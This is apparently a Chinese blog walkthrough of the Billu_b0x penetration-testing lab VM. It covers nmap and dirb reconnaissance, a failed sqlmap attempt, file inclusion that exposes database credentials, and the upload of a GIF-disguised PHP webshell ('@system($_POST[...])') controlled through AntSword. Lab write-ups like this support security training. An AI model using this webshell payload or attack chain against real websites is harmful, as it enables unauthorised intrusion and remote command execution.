Billu_b0x靶场:一场关于网络安全的技术冒险

1.下载该靶场,并在虚拟机开启,确保网络适配器是NAT网段的

2.借助kali来确定该靶机的IP地址

复制代码
nmap -O 192.168.139.1/24

3.访问该IP地址

4.尝试访问一下robots.txt,什么也没有

5.接下来来到kali里面扫目录

复制代码
dirb http://192.168.139.168

6.首先访问add目录,发现文件上传

7.接下来依次访问目录

8.在192.168.139.168/in下查找发现网站绝对路径

9.使用sqlmap来进行爆破看是否存在注入

10.用sqlmap来扫这个数据包,发现不存在注入

11.文件包含漏洞利用,使用GET传递参数失败,使用POST传参成功

12.访问c.php,发现数据库的账号和密码为billu:b0x_billu

复制代码
mysqli_connect(host,username,password,dbname,port,socket);

13.回到数据库登录页面进行登录

14.查找有用信息发现了用户名和密码

15.然后在首页进行登录账号和密码为biLLu:hEx_it,发现可以进行文件上传

16.上传php文件查看,发现上传失败,只能上传图片文件

上传图片马,上传成功

复制代码
GIF89a
<?php @system($_POST['AAA'])?>

17.进行传参

18.用蚁剑进行连接,就可以连接成功

相关推荐
迎仔2 小时前
11-云网络与混合云运维:弹性数字世界的交通管理
网络·安全·web安全
pitch_dark2 小时前
渗透测试系统基础篇——kali系统
网络·安全·web安全
世界尽头与你2 小时前
(修复方案)基础目录枚举漏洞
安全·网络安全·渗透测试
ん贤2 小时前
一次批量删除引发的死锁,最终我选择不加锁
数据库·安全·go·死锁
独行soc2 小时前
2026年渗透测试面试题总结-20(题目+回答)
android·网络·安全·web安全·渗透测试·安全狮
翼龙云_cloud2 小时前
阿里云渠道商:阿里云 ECS 从安全组到云防火墙的实战防护指南
安全·阿里云·云计算
程序猿阿伟2 小时前
《TypeScript中Protobuf到运行时类型安全的转换指南》
javascript·安全·typescript
小白电脑技术2 小时前
飞牛漏洞焦虑?别瞎折腾WAF了!用Lucky五步搞定“防爬墙”
服务器·网络·安全
一战成名9962 小时前
深度解析 CANN 模型转换工具链:从 ONNX 到 OM
人工智能·学习·安全·开源
轻造科技2 小时前
工艺变更管理系统+版本控制:旧工艺自动作废,避免新旧版本混用
安全·mes系统·轻造科技